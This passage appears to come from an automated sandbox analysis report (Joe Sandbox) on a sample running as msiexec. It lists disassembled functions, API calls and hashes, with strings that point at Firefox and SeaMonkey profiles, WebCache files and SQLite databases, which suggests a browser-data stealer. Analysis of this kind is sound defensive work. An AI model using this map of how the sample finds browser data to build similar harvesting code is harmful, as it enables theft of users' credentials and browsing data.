                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                          • memset.MSVCRT ref: 00403F6B
                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                          • API String ID: 1829478387-2068335096
                                                                                          • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                          • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                          • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                          • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00403FE1
                                                                                          • memset.MSVCRT ref: 00403FF6
                                                                                          • memset.MSVCRT ref: 0040400B
                                                                                          • memset.MSVCRT ref: 00404020
                                                                                          • memset.MSVCRT ref: 00404035
                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                          • memset.MSVCRT ref: 004040FC
                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                          • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                          • API String ID: 1829478387-3369679110
                                                                                          • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                          • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                          • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                          • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                          APIs
                                                                                          • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy
                                                                                          • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                          • API String ID: 3510742995-2641926074
                                                                                          • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                          • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                          • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                          • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                          APIs
                                                                                          • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                          • GetLastError.KERNEL32 ref: 0041847E
                                                                                          • free.MSVCRT ref: 0041848B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateErrorFileLastfree
                                                                                          • String ID: |A
                                                                                          • API String ID: 981974120-1717621600
                                                                                          • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                          • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                          • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                          • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                          APIs
                                                                                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                            • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                            • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                          • memset.MSVCRT ref: 004033B7
                                                                                          • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                          • wcscmp.MSVCRT ref: 004033FC
                                                                                          • _wcsicmp.MSVCRT ref: 00403439
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                          • String ID: $0.@
                                                                                          • API String ID: 2758756878-1896041820
                                                                                          • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                          • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                          • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                          • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                          APIs
                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                          • String ID:
                                                                                          • API String ID: 2941347001-0
                                                                                          • Opcode ID: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                          • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                          • Opcode Fuzzy Hash: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                          • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00403C09
                                                                                          • memset.MSVCRT ref: 00403C1E
                                                                                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                          • wcscat.MSVCRT ref: 00403C47
                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                          • wcscat.MSVCRT ref: 00403C70
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memsetwcscat$wcscpywcslen
                                                                                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                          • API String ID: 2489821370-1174173950
                                                                                          • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                          • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                          • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                          • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0040A824
                                                                                          • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                          • wcscpy.MSVCRT ref: 0040A854
                                                                                          • wcscat.MSVCRT ref: 0040A86A
                                                                                          • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                          • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                          • String ID:
                                                                                          • API String ID: 669240632-0
                                                                                          • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                          • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                          • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                          • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                          APIs
                                                                                          • wcschr.MSVCRT ref: 00414458
                                                                                          • _snwprintf.MSVCRT ref: 0041447D
                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                          • String ID: "%s"
                                                                                          • API String ID: 1343145685-3297466227
                                                                                          • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                          • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                          • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                          • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                          • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProcProcessTimes
                                                                                          • String ID: GetProcessTimes$kernel32.dll
                                                                                          • API String ID: 1714573020-3385500049
                                                                                          • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                          • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                          • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                          • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 004087D6
                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                            • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                          • memset.MSVCRT ref: 00408828
                                                                                          • memset.MSVCRT ref: 00408840
                                                                                          • memset.MSVCRT ref: 00408858
                                                                                          • memset.MSVCRT ref: 00408870
                                                                                          • memset.MSVCRT ref: 00408888
                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                          • String ID:
                                                                                          • API String ID: 2911713577-0
                                                                                          • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                          • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                          • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                          • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                          APIs
                                                                                          • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                          • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                          • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcmp
                                                                                          • String ID: @ $SQLite format 3
                                                                                          • API String ID: 1475443563-3708268960
                                                                                          • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                          • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                          • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                          • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmpqsort
                                                                                          • String ID: /nosort$/sort
                                                                                          • API String ID: 1579243037-1578091866
                                                                                          • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                          • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                          • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                          • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0040E60F
                                                                                          • memset.MSVCRT ref: 0040E629
                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                          Strings
                                                                                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                          • API String ID: 3354267031-2114579845
                                                                                          • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                          • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                          • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                          • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                          APIs
                                                                                          Strings
                                                                                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset
                                                                                          • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                          • API String ID: 2221118986-1725073988
                                                                                          • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                          • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                          • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                          • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                          APIs
                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                          • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$memcmp
                                                                                          • String ID: $$8
                                                                                          • API String ID: 2808797137-435121686
                                                                                          • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                          • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                          • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                          • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                          APIs
                                                                                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                            • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                            • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                            • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                            • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                          • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                            • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,771B2EE0), ref: 0040E3EC
                                                                                          • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                          • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                            • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                          • String ID:
                                                                                          • API String ID: 1979745280-0
                                                                                          • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                          • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                          • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                          • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                          APIs
                                                                                            • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                          • memset.MSVCRT ref: 00414C87
                                                                                          • wcscpy.MSVCRT ref: 00414CFC
                                                                                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                          Strings
                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProcVersionmemsetwcscpy
                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                          • API String ID: 4182280571-2036018995
                                                                                          • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                          • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                          • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                          • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                          APIs
                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                          • memset.MSVCRT ref: 00403A55
                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
